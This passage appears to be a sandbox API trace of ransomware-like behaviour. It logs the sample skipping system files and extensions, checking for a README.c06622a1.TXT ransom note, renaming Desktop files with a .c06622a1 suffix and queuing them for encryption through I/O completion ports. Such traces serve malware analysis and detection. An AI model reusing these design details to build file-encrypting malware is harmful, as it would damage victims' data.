[0155.793] wcslen (_String="ani") returned 0x3 [0155.793] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0155.793] wcslen (_String="bat") returned 0x3 [0155.793] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0155.793] wcslen (_String="bin") returned 0x3 [0155.793] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0155.793] wcslen (_String="cab") returned 0x3 [0155.793] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0155.793] wcslen (_String="cmd") returned 0x3 [0155.793] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0155.793] wcslen (_String="com") returned 0x3 [0155.793] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0155.793] wcslen (_String="cpl") returned 0x3 [0155.793] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0155.793] wcslen (_String="cur") returned 0x3 [0155.793] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0155.793] wcslen (_String="deskthemepack") returned 0xd [0155.793] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0155.793] wcslen (_String="diagcab") returned 0x7 [0155.793] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0155.793] wcslen (_String="diagcfg") returned 0x7 [0155.793] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0155.793] wcslen (_String="diagpkg") returned 0x7 [0155.793] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0155.793] wcslen (_String="dll") returned 0x3 [0155.793] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0155.793] wcslen (_String="drv") returned 0x3 [0155.793] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0155.793] wcslen (_String="exe") returned 0x3 [0155.793] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0155.793] wcslen (_String="hlp") returned 0x3 [0155.793] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0155.794] wcslen (_String="icl") returned 0x3 [0155.794] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0155.794] wcslen (_String="icns") returned 0x4 [0155.794] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0155.794] wcslen (_String="ico") returned 0x3 [0155.794] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0155.794] wcslen (_String="ics") returned 0x3 [0155.794] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0155.794] wcslen (_String="idx") returned 0x3 [0155.794] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0155.794] wcslen (_String="ldf") returned 0x3 [0155.794] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0155.794] wcslen (_String="lnk") returned 0x3 [0155.794] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0155.794] wcslen (_String="mod") returned 0x3 [0155.794] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0155.794] wcslen (_String="mpa") returned 0x3 [0155.794] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0155.794] wcslen (_String="msc") returned 0x3 [0155.794] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0155.794] wcslen (_String="msp") returned 0x3 [0155.794] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0155.794] wcslen (_String="msstyles") returned 0x8 [0155.794] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0155.794] wcslen (_String="msu") returned 0x3 [0155.794] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0155.794] wcslen (_String="nls") returned 0x3 [0155.794] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0155.794] wcslen (_String="nomedia") returned 0x7 [0155.794] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0155.794] wcslen (_String="ocx") returned 0x3 [0155.794] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0155.794] wcslen (_String="prf") returned 0x3 [0155.794] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0155.794] wcslen (_String="ps1") returned 0x3 [0155.795] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0155.795] wcslen (_String="rom") returned 0x3 [0155.795] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0155.795] wcslen (_String="rtp") returned 0x3 [0155.795] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0155.795] wcslen (_String="scr") returned 0x3 [0155.795] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0155.795] wcslen (_String="shs") returned 0x3 [0155.795] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0155.795] wcslen (_String="spl") returned 0x3 [0155.795] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0155.795] wcslen (_String="sys") returned 0x3 [0155.795] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0155.795] wcslen (_String="theme") returned 0x5 [0155.795] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0155.795] wcslen (_String="themepack") returned 0x9 [0155.795] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0155.795] wcslen (_String="wpx") returned 0x3 [0155.795] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0155.795] wcslen (_String="lock") returned 0x4 [0155.795] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0155.795] wcslen (_String="key") returned 0x3 [0155.795] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0155.795] wcslen (_String="hta") returned 0x3 [0155.795] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0155.795] wcslen (_String="msi") returned 0x3 [0155.795] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0155.795] wcslen (_String="pdb") returned 0x3 [0155.795] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0155.795] wcslen (_String="sqlite") returned 0x6 [0155.795] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0155.795] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0155.796] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0155.796] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0155.796] wcscpy (in: _Dest=0x208e74, _Source="5KWbxml7IT.bmp" | out: _Dest="5KWbxml7IT.bmp") returned="5KWbxml7IT.bmp" [0155.796] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5KWbxml7IT.bmp", dwFileAttributes=0x80) returned 1 [0155.796] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5KWbxml7IT.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5kwbxml7it.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0155.796] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.796] ReadFile (in: hFile=0x1c0, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0155.797] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xebe6d965 [0155.797] RtlComputeCrc32 (PartialCrc=0xd965, Buffer=0x32ec24, Length=0x80) returned 0x131bbf62 [0155.797] RtlComputeCrc32 (PartialCrc=0xbf62, Buffer=0x32ec24, Length=0x80) returned 0x199fc3e5 [0155.797] RtlComputeCrc32 (PartialCrc=0xc3e5, Buffer=0x32ec24, Length=0x80) returned 0xebf60084 [0155.797] RtlComputeCrc32 (PartialCrc=0x84, Buffer=0x32ec24, Length=0x80) returned 0xd4098aed [0155.797] CloseHandle (hObject=0x1c0) returned 1 [0155.797] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0155.797] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5KWbxml7IT.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5KWbxml7IT.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5KWbxml7IT.bmp" [0155.797] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5KWbxml7IT.bmp") returned 0x38 [0155.797] wcscpy (in: _Dest=0x218e98, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.797] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5KWbxml7IT.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5kwbxml7it.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5KWbxml7IT.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5kwbxml7it.bmp.c06622a1"), dwFlags=0x8) returned 1 [0155.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5KWbxml7IT.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5kwbxml7it.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c0 [0155.800] CreateIoCompletionPort (FileHandle=0x1c0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0155.800] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3510020 [0155.809] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2498dbcf [0155.809] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x17836d3c [0155.809] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1c0f14b8 [0155.809] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x58c25188 [0155.809] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x114c2082 [0155.809] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x782bdcc4 [0155.809] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x30b17699 [0155.809] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5c7f5fb [0155.812] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3510094, Length=0x80) returned 0x99ddd3e8 [0155.812] RtlComputeCrc32 (PartialCrc=0xd3e8, Buffer=0x3510094, Length=0x80) returned 0xcce813b6 [0155.812] RtlComputeCrc32 (PartialCrc=0x13b6, Buffer=0x3510094, Length=0x80) returned 0xb10512a6 [0155.812] RtlComputeCrc32 (PartialCrc=0x12a6, Buffer=0x3510094, Length=0x80) returned 0xd50a2174 [0155.812] RtlComputeCrc32 (PartialCrc=0x2174, Buffer=0x3510094, Length=0x80) returned 0xe2b278f2 [0155.812] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0155.812] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0155.813] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0155.813] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b4540c0, ftCreationTime.dwHighDateTime=0x1d5e1ce, ftLastAccessTime.dwLowDateTime=0xd8293a10, ftLastAccessTime.dwHighDateTime=0x1d5e0c4, ftLastWriteTime.dwLowDateTime=0xd8293a10, ftLastWriteTime.dwHighDateTime=0x1d5e0c4, nFileSizeHigh=0x0, nFileSizeLow=0x3b9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="5YFB2IUVJV0.bmp", cAlternateFileName="5YFB2I~1.BMP")) returned 1 [0155.813] _wcsicmp (_Str1="5YFB2IUVJV0.bmp", _Str2="README.c06622a1.TXT") returned -61 [0155.813] wcsstr (_Str="5YFB2IUVJV0.bmp", _SubStr="README") returned 0x0 [0155.813] _wcsicmp (_Str1="autorun.inf", _Str2="5YFB2IUVJV0.bmp") returned 44 [0155.813] wcslen (_String="autorun.inf") returned 0xb [0155.813] _wcsicmp (_Str1="boot.ini", _Str2="5YFB2IUVJV0.bmp") returned 45 [0155.813] wcslen (_String="boot.ini") returned 0x8 [0155.813] _wcsicmp (_Str1="bootfont.bin", _Str2="5YFB2IUVJV0.bmp") returned 45 [0155.813] wcslen (_String="bootfont.bin") returned 0xc [0155.813] _wcsicmp (_Str1="bootsect.bak", _Str2="5YFB2IUVJV0.bmp") returned 45 [0155.813] wcslen (_String="bootsect.bak") returned 0xc [0155.813] _wcsicmp (_Str1="desktop.ini", _Str2="5YFB2IUVJV0.bmp") returned 47 [0155.813] wcslen (_String="desktop.ini") returned 0xb [0155.813] _wcsicmp (_Str1="iconcache.db", _Str2="5YFB2IUVJV0.bmp") returned 52 [0155.813] wcslen (_String="iconcache.db") returned 0xc [0155.813] _wcsicmp (_Str1="ntldr", _Str2="5YFB2IUVJV0.bmp") returned 57 [0155.813] wcslen (_String="ntldr") returned 0x5 [0155.813] _wcsicmp (_Str1="ntuser.dat", _Str2="5YFB2IUVJV0.bmp") returned 57 [0155.813] wcslen (_String="ntuser.dat") returned 0xa [0155.813] _wcsicmp (_Str1="ntuser.dat.log", _Str2="5YFB2IUVJV0.bmp") returned 57 [0155.813] wcslen (_String="ntuser.dat.log") returned 0xe [0155.813] _wcsicmp (_Str1="ntuser.ini", _Str2="5YFB2IUVJV0.bmp") returned 57 [0155.813] wcslen (_String="ntuser.ini") returned 0xa [0155.814] _wcsicmp (_Str1="thumbs.db", _Str2="5YFB2IUVJV0.bmp") returned 63 [0155.814] wcslen (_String="thumbs.db") returned 0x9 [0155.814] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0155.814] wcslen (_String="386") returned 0x3 [0155.814] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0155.814] wcslen (_String="adv") returned 0x3 [0155.814] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0155.814] wcslen (_String="ani") returned 0x3 [0155.814] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0155.814] wcslen (_String="bat") returned 0x3 [0155.814] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0155.814] wcslen (_String="bin") returned 0x3 [0155.814] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0155.814] wcslen (_String="cab") returned 0x3 [0155.814] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0155.814] wcslen (_String="cmd") returned 0x3 [0155.814] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0155.814] wcslen (_String="com") returned 0x3 [0155.814] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0155.814] wcslen (_String="cpl") returned 0x3 [0155.814] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0155.814] wcslen (_String="cur") returned 0x3 [0155.814] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0155.814] wcslen (_String="deskthemepack") returned 0xd [0155.814] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0155.814] wcslen (_String="diagcab") returned 0x7 [0155.815] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0155.815] wcslen (_String="diagcfg") returned 0x7 [0155.815] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0155.815] wcslen (_String="diagpkg") returned 0x7 [0155.815] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0155.815] wcslen (_String="dll") returned 0x3 [0155.815] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0155.815] wcslen (_String="drv") returned 0x3 [0155.815] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0155.815] wcslen (_String="exe") returned 0x3 [0155.815] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0155.815] wcslen (_String="hlp") returned 0x3 [0155.815] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0155.815] wcslen (_String="icl") returned 0x3 [0155.815] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0155.815] wcslen (_String="icns") returned 0x4 [0155.815] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0155.815] wcslen (_String="ico") returned 0x3 [0155.815] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0155.815] wcslen (_String="ics") returned 0x3 [0155.815] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0155.815] wcslen (_String="idx") returned 0x3 [0155.815] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0155.815] wcslen (_String="ldf") returned 0x3 [0155.815] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0155.815] wcslen (_String="lnk") returned 0x3 [0155.815] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0155.815] wcslen (_String="mod") returned 0x3 [0155.815] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0155.816] wcslen (_String="mpa") returned 0x3 [0155.816] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0155.816] wcslen (_String="msc") returned 0x3 [0155.816] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0155.816] wcslen (_String="msp") returned 0x3 [0155.816] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0155.816] wcslen (_String="msstyles") returned 0x8 [0155.816] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0155.816] wcslen (_String="msu") returned 0x3 [0155.816] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0155.816] wcslen (_String="nls") returned 0x3 [0155.816] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0155.816] wcslen (_String="nomedia") returned 0x7 [0155.816] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0155.816] wcslen (_String="ocx") returned 0x3 [0155.816] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0155.816] wcslen (_String="prf") returned 0x3 [0155.816] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0155.816] wcslen (_String="ps1") returned 0x3 [0155.816] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0155.816] wcslen (_String="rom") returned 0x3 [0155.816] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0155.816] wcslen (_String="rtp") returned 0x3 [0155.816] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0155.816] wcslen (_String="scr") returned 0x3 [0155.816] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0155.816] wcslen (_String="shs") returned 0x3 [0155.816] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0155.816] wcslen (_String="spl") returned 0x3 [0155.816] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0155.816] wcslen (_String="sys") returned 0x3 [0155.817] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0155.817] wcslen (_String="theme") returned 0x5 [0155.817] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0155.817] wcslen (_String="themepack") returned 0x9 [0155.817] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0155.817] wcslen (_String="wpx") returned 0x3 [0155.817] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0155.817] wcslen (_String="lock") returned 0x4 [0155.817] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0155.817] wcslen (_String="key") returned 0x3 [0155.817] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0155.817] wcslen (_String="hta") returned 0x3 [0155.817] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0155.817] wcslen (_String="msi") returned 0x3 [0155.817] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0155.817] wcslen (_String="pdb") returned 0x3 [0155.817] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0155.817] wcslen (_String="sqlite") returned 0x6 [0155.817] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0155.818] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0155.818] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0155.818] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0155.818] wcscpy (in: _Dest=0x208e74, _Source="5YFB2IUVJV0.bmp" | out: _Dest="5YFB2IUVJV0.bmp") returned="5YFB2IUVJV0.bmp" [0155.818] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5YFB2IUVJV0.bmp", dwFileAttributes=0x80) returned 1 [0155.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5YFB2IUVJV0.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5yfb2iuvjv0.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0155.818] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.818] ReadFile (in: hFile=0x1d8, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0155.819] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x9fe340fe [0155.819] RtlComputeCrc32 (PartialCrc=0x40fe, Buffer=0x32ec24, Length=0x80) returned 0x6d69e567 [0155.819] RtlComputeCrc32 (PartialCrc=0xe567, Buffer=0x32ec24, Length=0x80) returned 0xc9b502 [0155.819] RtlComputeCrc32 (PartialCrc=0xb502, Buffer=0x32ec24, Length=0x80) returned 0x3e1e024d [0155.819] RtlComputeCrc32 (PartialCrc=0x24d, Buffer=0x32ec24, Length=0x80) returned 0x251a09bf [0155.819] CloseHandle (hObject=0x1d8) returned 1 [0155.819] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0155.820] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5YFB2IUVJV0.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5YFB2IUVJV0.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5YFB2IUVJV0.bmp" [0155.820] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5YFB2IUVJV0.bmp") returned 0x39 [0155.820] wcscpy (in: _Dest=0x218e9a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.820] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5YFB2IUVJV0.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5yfb2iuvjv0.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5YFB2IUVJV0.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5yfb2iuvjv0.bmp.c06622a1"), dwFlags=0x8) returned 1 [0155.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5YFB2IUVJV0.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5yfb2iuvjv0.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d8 [0155.823] CreateIoCompletionPort (FileHandle=0x1d8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0155.823] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x35a0020 [0155.829] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7ee49aa9 [0155.829] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5a099080 [0155.829] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7d22212 [0155.829] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x40f6f11 [0155.829] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4d4c2561 [0155.829] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x68ee0fe7 [0155.830] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x78dd46fd [0155.830] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x209a1e1b [0155.833] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x35a0094, Length=0x80) returned 0xabaa96ab [0155.833] RtlComputeCrc32 (PartialCrc=0x96ab, Buffer=0x35a0094, Length=0x80) returned 0xbf241d57 [0155.833] RtlComputeCrc32 (PartialCrc=0x1d57, Buffer=0x35a0094, Length=0x80) returned 0x486f23bd [0155.833] RtlComputeCrc32 (PartialCrc=0x23bd, Buffer=0x35a0094, Length=0x80) returned 0x60272596 [0155.833] RtlComputeCrc32 (PartialCrc=0x2596, Buffer=0x35a0094, Length=0x80) returned 0x6c432ae1 [0155.833] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x35a0020) returned 1 [0155.833] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0155.833] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0155.833] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeeec8510, ftCreationTime.dwHighDateTime=0x1d5e48c, ftLastAccessTime.dwLowDateTime=0xd5d14170, ftLastAccessTime.dwHighDateTime=0x1d5dcc0, ftLastWriteTime.dwLowDateTime=0xd5d14170, ftLastWriteTime.dwHighDateTime=0x1d5dcc0, nFileSizeHigh=0x0, nFileSizeLow=0xbfa7, dwReserved0=0x0, dwReserved1=0x0, cFileName="5zWh464.avi", cAlternateFileName="")) returned 1 [0155.833] _wcsicmp (_Str1="5zWh464.avi", _Str2="README.c06622a1.TXT") returned -61 [0155.833] wcsstr (_Str="5zWh464.avi", _SubStr="README") returned 0x0 [0155.833] _wcsicmp (_Str1="autorun.inf", _Str2="5zWh464.avi") returned 44 [0155.833] wcslen (_String="autorun.inf") returned 0xb [0155.833] _wcsicmp (_Str1="boot.ini", _Str2="5zWh464.avi") returned 45 [0155.833] wcslen (_String="boot.ini") returned 0x8 [0155.833] _wcsicmp (_Str1="bootfont.bin", _Str2="5zWh464.avi") returned 45 [0155.833] wcslen (_String="bootfont.bin") returned 0xc [0155.833] _wcsicmp (_Str1="bootsect.bak", _Str2="5zWh464.avi") returned 45 [0155.833] wcslen (_String="bootsect.bak") returned 0xc [0155.833] _wcsicmp (_Str1="desktop.ini", _Str2="5zWh464.avi") returned 47 [0155.833] wcslen (_String="desktop.ini") returned 0xb [0155.833] _wcsicmp (_Str1="iconcache.db", _Str2="5zWh464.avi") returned 52 [0155.833] wcslen (_String="iconcache.db") returned 0xc [0155.833] _wcsicmp (_Str1="ntldr", _Str2="5zWh464.avi") returned 57 [0155.833] wcslen (_String="ntldr") returned 0x5 [0155.833] _wcsicmp (_Str1="ntuser.dat", 